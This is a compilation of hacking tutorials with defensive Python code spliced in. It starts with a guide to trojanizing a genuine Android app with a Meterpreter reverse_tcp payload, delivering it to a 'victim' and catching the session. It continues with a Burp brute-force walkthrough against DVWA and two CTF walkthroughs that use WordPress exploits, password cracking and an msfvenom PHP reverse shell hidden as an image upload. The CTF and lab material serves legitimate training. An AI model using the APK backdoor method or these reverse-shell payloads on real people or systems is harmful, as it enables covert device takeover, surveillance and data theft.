Hack Android Phone using Backdoor Apk

Sometimes in hacking we have to use the most genuine-looking method so that the victim is surely hacked. These genuine ways are to be used to our advantage. One of the most genuine ways to hack an Android phone is to bind an original Android app to your backdoor APK. backdoor-apk is a tool which binds the original APK file with your payload, hence taking all suspicion away from you.

To begin, execute the following command:

apt-get install lib32stdc++6 lib32ncurses5 lib32z1

Once the command has executed and the installation is done, download backdoor-apk from GitHub; for that type:

git clone https://github.com/dana-at-cp/backdoor-apk.git

Once the tool is downloaded, go to the www.apk4fun.com website and download an original APK file; I downloaded CCleaner. Then copy it into the backdoor-apk folder.

Open the folder in a terminal and type:

./backdoor-apk.sh ccleaner.apk

As the command runs it will ask you for the payload you want to use; select 3. It will then ask you for the LHOST and LPORT; give these respectively.

The above commands bind the payload to the original APK file and save the result in the backdoor-apk/original/dist folder.

Now all you have to do is send the file to the victim; he will install it by tapping Next.

Then tap Install to install the app.

This way the app gets installed.

Before opening the app, open Metasploit and type:

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set lhost 192.168.1.126

set lport 4444

exploit

After this, when you run the app, you will get a meterpreter session.

Hence the victim is hacked through an app that looks completely genuine.

Brute Force Website Login Page using Burpsuite (Beginner Guide)

In this article we will learn to perform a dictionary attack from Burp Suite, and we will try to crack the password of the DVWA lab.

Burp Suite: Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities.

Burp gives you full control, letting you combine advanced manual techniques with state-of-the-art automation, to make your work faster, more effective, and more fun. Importantly, it gives us another way to manage our attacks as an alternative to Metasploit.

To make Burp Suite work, first we have to turn on a manual proxy in the browser; for that go to the settings and choose Preferences.

Then select the Advanced option, go to Network and select Settings.

Now select Manual proxy configuration.

This way your manual proxy will be active, as you can see below.

Now, on the other hand, open DVWA and log into it using its default username and password.

Once you log in, click on Brute Force. Also make sure that the security level is set to low or medium.

When you click on Brute Force, it will ask you for a username and password. Before entering them, open Burp Suite, select the Proxy tab and turn on interception by clicking the Intercept is on/off button.

With interception turned on, enter any password you like, just so that Burp Suite can capture the request.

Send the captured request to Intruder by right clicking in the request area and choosing the Send to Intruder option, or simply press Ctrl + I.

Now open the Intruder tab, then select the Positions tab and the following will be visible:

Choose the Attack type as Cluster Bomb.

Now select the username and password values as shown below:

In the above image we have selected username and password, which means we will need two dictionary files: one for usernames and a second for passwords.

So now go to the Payloads tab and select 1 from Payload set (this '1' denotes the username file). Then click on the Load button, browse and select your dictionary file for usernames.

Now select 2 in the Payload set and similarly give the dictionary file for the password.

Now all you have to do is go to the Intruder menu and select Start attack from the drop-down menu.

Sit back and relax, because now Burp Suite will do its work, matching usernames and passwords, and will give you the correct username and password. The moment it finds the correct values, the value in the Length column changes, as shown:

To confirm it, check the response: it will say "Welcome to the password protected area admin".

And this way it's all done.
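From the defender's side, the same Intruder run is visible in the web server's access log: every Cluster Bomb request hits the login page with a different password parameter, and the one correct guess comes back with a different response size, the same "Length changed" signal Burp shows. The Python below is an added example, not part of the original guide; the log lines are constructed to mimic DVWA's Brute Force page (which passes username and password as GET parameters), and the login path and thresholds are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import urlsplit, parse_qs

# Constructed sample Apache access log lines (not from the original post). DVWA's
# Brute Force page takes username/password as GET parameters, so each Intruder
# request leaves one line; the correct guess has a different response size.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Oct/2016:10:15:01 +0000] "GET /dvwa/vulnerabilities/brute/?username=admin&password=123456&Login=Login HTTP/1.1" 200 4623 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Oct/2016:10:15:01 +0000] "GET /dvwa/vulnerabilities/brute/?username=admin&password=letmein&Login=Login HTTP/1.1" 200 4623 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Oct/2016:10:15:02 +0000] "GET /dvwa/vulnerabilities/brute/?username=admin&password=qwerty&Login=Login HTTP/1.1" 200 4623 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Oct/2016:10:15:03 +0000] "GET /dvwa/vulnerabilities/brute/?username=admin&password=password&Login=Login HTTP/1.1" 200 4782 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Oct/2016:10:15:04 +0000] "GET /dvwa/vulnerabilities/brute/?username=admin&password=welcome&Login=Login HTTP/1.1" 200 4623 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Oct/2016:10:15:20 +0000] "GET /dvwa/vulnerabilities/brute/?username=gordonb&password=abc123&Login=Login HTTP/1.1" 200 4782 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<url>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)')

def parse_line(line):
    """Parse one combined-format access log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["url"])
    q = parse_qs(url.query)
    return {"ip": m["ip"], "path": url.path,
            "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
            "user": q.get("username", [None])[0],
            "password": q.get("password", [None])[0],
            "size": int(m["size"]) if m["size"].isdigit() else 0}

def detect_bruteforce(lines, login_path="/dvwa/vulnerabilities/brute/", threshold=5, window_s=60):
    """Flag source IPs that try >= threshold distinct passwords against login_path
    within any window_s-second window. Returns {ip: {attempts, users, outlier_sizes}}."""
    per_ip = defaultdict(list)
    for rec in filter(None, map(parse_line, lines)):
        if rec["path"] == login_path and rec["password"] is not None:
            per_ip[rec["ip"]].append(rec)
    findings = {}
    for ip, recs in per_ip.items():
        recs.sort(key=lambda r: r["ts"])
        start = 0
        for end in range(len(recs)):  # sliding time window over this IP's attempts
            while (recs[end]["ts"] - recs[start]["ts"]).total_seconds() > window_s:
                start += 1
            if len({r["password"] for r in recs[start:end + 1]}) >= threshold:
                sizes = [r["size"] for r in recs]
                common = max(set(sizes), key=sizes.count)
                findings[ip] = {"attempts": len(recs),
                                "users": sorted({r["user"] for r in recs}),
                                # a response size unlike the rest marks the guess that worked
                                "outlier_sizes": sorted({s for s in sizes if s != common})}
                break
    return findings
```

Running `detect_bruteforce(SAMPLE_LOG.splitlines())` flags only 10.0.0.5, reporting the single outlier size 4782; the one legitimate login from 10.0.0.9 is left alone.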

Shivam Gupta is an Ethical Hacker, Cyber Security Expert and Penetration Tester from India.

Hack the Minotaur VM (CTF Challenge)

Minotaur is a Boot2Root CTF challenge which helps us improve our skills, especially password cracking. The VM will assign itself a specific IP address (in the 192.168.56.0/24 range). Do not change this, as the CTF will not work properly without an IP address in that range. Things to keep in mind:

  • One password you will need is not on rockyou.txt or any other wordlist you may have out there. So you need to think of a way to generate it yourself.
  • This CTF has a couple of fairly heavy password cracking challenges, and some red herrings.

You can download this VM from –> https://www.vulnhub.com/entry/sectalks-bne0x00-minotaur,139/

WalkThrough

We will start off with nmap because we already have our target IP.

nmap -p- -A 192.168.56.223

The nmap result shows that ports 22, 80 and 2020 are open. We can use ports 22 and 80 to our advantage.

We then tried to explore through nikto and curl, but unfortunately found nothing of use. So we decided to use DirBuster.

Go to the Kali terminal and type:

dirbuster

It will open DirBuster. In it, enter the URL in the Target URL box and select the directory-list-2.3-medium.txt file in the File with list of dirs/files box.

It will show you a directory called /bull/.

Open the said directory in your browser.

It shows that there is a blog made in WordPress. As the blog is in WordPress we can use WPScan to find usernames and vulnerable themes and plug-ins. To run WPScan type:

wpscan -u http://192.168.56.223/bull/ --enumerate u

The command will start executing and will show you all the exploitable plug-ins along with the usernames.

As you can see, there is only one user, with the username bully. There is also a plug-in exploit for Slideshow Gallery, but it requires a username and password to work. We already have the username; all we need is its password, and we have no idea where to find it as we have no dictionary or password file. Therefore we will make a password file using CeWL.

CeWL is a Ruby app which spiders a given URL to a specified depth, optionally following external links, and returns a list of words which can then be used for password cracking. To make a password file with CeWL, go to your Kali terminal and type:

cewl http://192.168.56.223/bull -m 3 -w /root/Desktop/pass.txt

This will create a .txt file with a list of all the words that could possibly be the password for the user bully.

Now, to find which one is its password, we will use Burp Suite. So apply a dictionary attack using Burp Suite; the moment it finds the correct password, the value in the Length column changes, as shown below:

Now that we know the username and password we can use the exploit for the plug-in. To do so, open Metasploit and type:

use exploit/unix/webapp/wp_slideshowgallery_upload

set rhost 192.168.56.223

set rport 80

set targeturi /bull/

set wp_user bully

set wp_password Bighornedbulls

exploit

As the exploit runs it will give you a meterpreter session. Next, type:

shell

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py

python /tmp/asdf.py

Executing the above commands takes you to a terminal on your target. Then move into the /var/www/html folder and type:

ls -lsa

We found a flag here; let's read it.

cat flag.txt

Then we went into the /tmp folder and read the flag there:

cd /tmp

ls -lsa

cat flag.txt

Now we had found two flags, but they were not the main flags; we also got a hint that a shadow.bak file could be useful to us. Let's have a look at it.

cat shadow.bak
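What makes this find so dangerous is a shadow backup left where a low-privileged shell can read it, with accounts hashed by algorithms that John gets through quickly. The Python below is an added example, not part of the original walkthrough: it parses a shadow-format file, reports each crackable account with its crypt(3) hash type and a risk rating, and checks whether backup copies such as /tmp/shadow.bak are world readable. The sample contents and hash bodies are constructed, and the strength ratings are assumptions rather than a standard.

```python
import os
import stat

# Constructed sample of a leaked shadow backup (fake hash bodies, not the VM's file).
SAMPLE_SHADOW = """\
root:$6$c0nstructed$ZmFrZWhhc2g:17080:0:99999:7:::
heffer:$1$c0nstruc$ZmFrZWhhc2g:17080:0:99999:7:::
minotaur:$6$c0nstructed$ZmFrZWhhc2g:17080:0:99999:7:::
www-data:*:17080:0:99999:7:::
guest::17080:0:99999:7:::
"""

# crypt(3) hash identifiers and an assumed rating of their brute-force resistance.
HASH_IDS = {"$1$": ("md5crypt", "weak"), "$5$": ("sha256crypt", "ok"),
            "$6$": ("sha512crypt", "ok"), "$2a$": ("bcrypt", "strong"),
            "$2b$": ("bcrypt", "strong"), "$2y$": ("bcrypt", "strong"),
            "$y$": ("yescrypt", "strong"), "$7$": ("scrypt", "strong")}

def classify_hash(field):
    """Map the second shadow field to (algorithm, risk)."""
    if field == "":
        return "empty", "critical"          # account with no password at all
    if field.startswith(("*", "!")):
        return "locked", "none"             # cannot be used for password login
    for prefix, (name, risk) in HASH_IDS.items():
        if field.startswith(prefix):
            return name, risk
    return "descrypt/unknown", "weak"       # no $id$ prefix: traditional DES crypt

def audit_shadow(text):
    """Return [(user, algorithm, risk)] for every account whose hash can be cracked."""
    findings = []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) < 2 or not fields[0]:
            continue
        algo, risk = classify_hash(fields[1])
        if risk != "none":
            findings.append((fields[0], algo, risk))
    return findings

def find_exposed_backups(paths, stat_fn=os.stat):
    """Return the given paths whose mode grants 'other' read access (world readable)."""
    exposed = []
    for p in paths:
        try:
            st = stat_fn(p)
        except OSError:
            continue                        # missing file: nothing to leak
        if st.st_mode & stat.S_IROTH:
            exposed.append(p)
    return exposed
```

`audit_shadow(SAMPLE_SHADOW)` lists heffer under md5crypt as weak and guest as critical, while `find_exposed_backups(["/tmp/shadow.bak", "/etc/shadow.bak"])` names whichever copy on the host is readable by everyone.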

We will take the help of the John the Ripper password cracker to find the passwords:

john shadow.bak

We found the passwords for both heffer and minotaur. Recall that port 22, i.e. SSH, was open; we can use it to log in, and for this type:

ssh heffer@192.168.56.223

Give the password when asked and then check its directories:

ls -lsa

We found a flag here. Read it.

cat flag.txt

In the flag we found another flag along with a hint indicating that the flag is minotaur. Now we will log in through SSH using minotaur:

ssh minotaur@192.168.56.223

Give the password when asked. Then check the directories:

ls -lsa

There is another flag available. Again, read it.

cat flag.txt

Now we have finally found the first flag, along with another hint that the final flag is in /root/flag.txt.

Moving on, type the following to gain root access and switch user:

sudo su

cd ..

cd ..

This will take you two directories up. Here, type:

cd root

ls -lsa

Finally we have found the last flag.

cat flag.txt

WOOHOO!!! The flag is captured. Congrats and enjoy!!

Author: Yashika Dhir is a passionate researcher and technical writer at Hacking Articles. She is a hacking enthusiast.

Hack the TommyBoy VM (CTF Challenge)

Tommy Boy VM is a CTF based on the movie Tommy Boy and the fictitious company "Callahan Auto" from the movie. This CTF was created by Brian Johnson of 7 Minute Security. It is a really fun VM: a few bits of it were fairly easy, some parts were really tricky, and there are some pretty neat little tricks in there too.

WalkThrough

Start off by scanning the network to find our target. The command for it is:

netdiscover

We found our target –> 192.168.0.102

Our next step is to scan our target with nmap. We will apply an aggressive scan as it is quick.

nmap -A 192.168.0.102

The result shows us that 3 ports are open: 22 (ssh), 80 (http), 8008 (http).

Moving on, we will use nikto to get detailed information about our target. For this, type:

nikto -h 192.168.0.102

Using nikto we found that there is a text file named robots.txt which might contain some information. We wanted to have a look at it, so we opened it in our browser. And yes, we found our first flag.

Opening the first flag, we found that there are a total of five flags whose combination will open the treasure in our scavenger hunt. And of course we found the first flag, i.e. part one of five of a password.

To explore further and find the rest of the flags we browsed to port 80 and were greeted with the Callahan Auto page, which apparently was experiencing some technical difficulties.

Now, as we were stuck there, we thought about using the curl command. As we all know, it provides a library and command-line tool for transferring data using various protocols, along with a lot of detailed information which can be used on various occasions. To use curl type:

curl http://192.168.0.102

Executing the curl command we found a YouTube link. No harm in opening it, so let us do that.

Opening the YouTube link, we learn that it has something to do with a prehistoric forest. So we decided to try it in the browser as –> 192.168.0.102/prehistoricforest/

And to our luck we found a lot of information. The first piece of information was that the website was made in WordPress.

Knowing the website was made in WordPress automatically had us use WPScan. To use it, open a terminal in Kali and type:

wpscan --url http://192.168.0.102/prehistoricforest --enumerate user

Applying WPScan proved useful and we found that there are indeed four users. This information came in handy later.

Further investigating the same "prehistoricforest" page we found other important things, like the text file which contained our second flag.

As we opened the text file we had our second flag. Two down, three more to go.

As we found another important clue on the same prehistoric forest web page we decided to investigate further, and this decision proved right: we found another clue which said to use /richard instead of /prehistoricforest.

We did as stated above and stumbled upon an image.

This image, as it is, gave us no clue. So we decided to open it with an EXIF reader. There was no need to use third-party software as EXIF readers are available online. Click on the browse option to supply the image.

Investigating the image we find an MD5 hash value.

Go to www.md5cracker.org and crack the MD5 hash we just discovered. On cracking it we find that it makes up the word spanky.

Now this word spanky can be our password, so if we open the URL 192.168.0.102/prehistoricforest/ and open one of the comments, it will ask for a password. So, give the password as spanky.

It will open a page with some hints. Reading it, there are only two things to remember:

  • There is something about nickburns
  • There is an FTP port open.

Now, we scanned before and did not find an FTP port anywhere. So let us scan port by port. For that type:

nmap -p 1-65535 192.168.0.102

From the above scan we can see that port 65534 is open. This might be the port to which the FTP service has been forwarded. So now access this port using WinSCP.

Open the WinSCP software, give the target's IP and the port number along with the username nickburns and the password spanky.

Import the file readme.txt.

Opening the file you will come across the following:

In the file you will see that he is talking about a subfolder "NickizL33t".

Furthermore, we will find the following page:

Now if you pay attention and use common sense you will see that it says "only me and Steve Jobs are allowed to look at this stuff", which means we can read it with an iPhone. Obviously not every one of us has an iPhone, so don't get upset: we have a substitute for it.

There is an add-on for Mozilla Firefox named "User Agent Switcher" which will allow you to read the said file.

When you have added this add-on, go to the Tools menu. A drop-down menu will appear; select Default User Agent and from it select the iPhone 3.0 option.

After doing so, the page will appear somewhat like the following:

Now he is talking about some .html file. As we have already checked everywhere and didn't find such a file, it is possible that this file is hidden, so let's use DirBuster to find it.

Open DirBuster, give the target's IP and the path of the dictionary file named rockyou.txt.

Also, select iPhone in HTTP User Agent.

It will show you that there is a hidden file fallon1.html. Upon opening it you will have:

  • A hint
  • Third flag
  • Big Tom’s encrypted pw backups

In hint.txt you will find hints all about the passwords.

And of course in the flag file you will find the third flag, i.e. the third part of the five-part password.

The third file is the one you will download.

We got all the hints about the password we needed. Therefore, we will generate a dictionary file using crunch; for this type:

crunch 13 13 -t bev,%%@@1995 -o /root/Desktop/dict.txt

Then we will crack the password of the zip file we just downloaded using fcrackzip, so type:

fcrackzip -u -D -p /root/Desktop/dict.txt /root/Desktop/t0msp4ssw0rdz.zip

Opening the zip file we have all three usernames and passwords except one.

Now to get the password for the fourth user we will use WPScan:

ruby ./scan.rb --url https://192.168.0.102/prehistoricforest --wordlist /usr/share/wordlists/rockyou.txt --username tom

After about 3 to 4 hours you will have the password, i.e. tomtom1.

Now we logged in to the admin page, but we did not find anything here except for the fact that there is something on the SSH port.

So now, we will try to log in over SSH:

ssh [email protected]

To see the list of files and folders type:

ls -lsa

As you can see we have got flag four, i.e. part four of five of the password. Read the flag:

cat el-flag-numero-quatro.txt

Besides the flag we have also found a backup file. Copy it so that we can open the home page properly in the browser:

cp callanhanbak.bak /var/www/html/index.html

Now open it in the browser.

Look into the page source:

Here you will find a note directing you towards a folder. Let's see what it has:

It is a page where you can upload a file. So create the code via msfvenom:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.106 lport=4444 -f raw

Copy the code from <?php up to die(); and save it to a .php file. If the page does not accept your PHP file, change its extension to PNG, JPG or GIF to upload it. While you upload the file, start multi/handler before running it by going to Metasploit and typing:

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lport 4444

set lhost 192.168.0.106

exploit

Then, as you run your uploaded file, you will get your meterpreter session. Then type shell to reach the shell of the VM.
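The upload form accepted the renamed payload because it only looked at the file extension. As an added example (not code from the VM or the original walkthrough), the Python below contrasts that extension-only check with a hardened validator that also verifies the image magic bytes, rejects double extensions such as shell.php.png, and refuses image files that carry PHP open tags inside them; the sample file contents are constructed placeholders, not the msfvenom output.

```python
import re

# Magic bytes a file must start with for each allowed image extension.
IMAGE_MAGIC = {"png": b"\x89PNG\r\n\x1a\n", "jpg": b"\xff\xd8\xff",
               "jpeg": b"\xff\xd8\xff", "gif": b"GIF8"}
SCRIPT_EXTS = {"php", "php5", "phtml", "phar"}
# PHP open tags anywhere in the body, including inside an otherwise valid image (polyglot).
PHP_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)

# Constructed test inputs (not the VM's files): a minimal PNG header and a harmless
# placeholder standing in for the PHP payload the walkthrough uploads.
PNG_BYTES = b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR"
PHP_BYTES = b"<?php echo 'constructed placeholder'; ?>"

def naive_validate(filename):
    """The extension-only check the walkthrough defeats by renaming .php to .png."""
    ext = filename.lower().rsplit(".", 1)[-1]
    return ext in IMAGE_MAGIC

def validate_upload(filename, data):
    """Hardened check on both the name and the bytes; returns (accepted, reason)."""
    parts = filename.lower().split(".")
    if len(parts) < 2:
        return False, "no extension"
    ext = parts[-1]
    if ext not in IMAGE_MAGIC:
        return False, "extension not allowed"
    if SCRIPT_EXTS & set(parts[1:-1]):
        return False, "script extension hidden before image extension"  # shell.php.png
    if not data.startswith(IMAGE_MAGIC[ext]):
        return False, "content is not a " + ext + " image"              # renamed .php
    if PHP_TAG.search(data):
        return False, "PHP code embedded in image"                      # polyglot image
    return True, "ok"
```

`naive_validate("shell.png")` returns True for the renamed payload, whereas `validate_upload("shell.png", PHP_BYTES)` rejects it because the bytes do not begin with a PNG header.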

Now, to read the fifth flag, the last part of the password, type:

cat /.5.txt

And voila!! You have captured all five flags, which make up the password that will open the zip file.

So, now unzip the zip file:

unzip LOOT.zip

Once the file is unzipped it will contain the last part of the challenge, i.e. a text file. Let's read it and finish this whole thing up:

cat THE-END.txt

HURRAYYY!!! We have captured all the flags, hence completing the challenge.

Author: Yashika Dhir is a passionate researcher and technical writer at Hacking Articles. She is a hacking enthusiast.
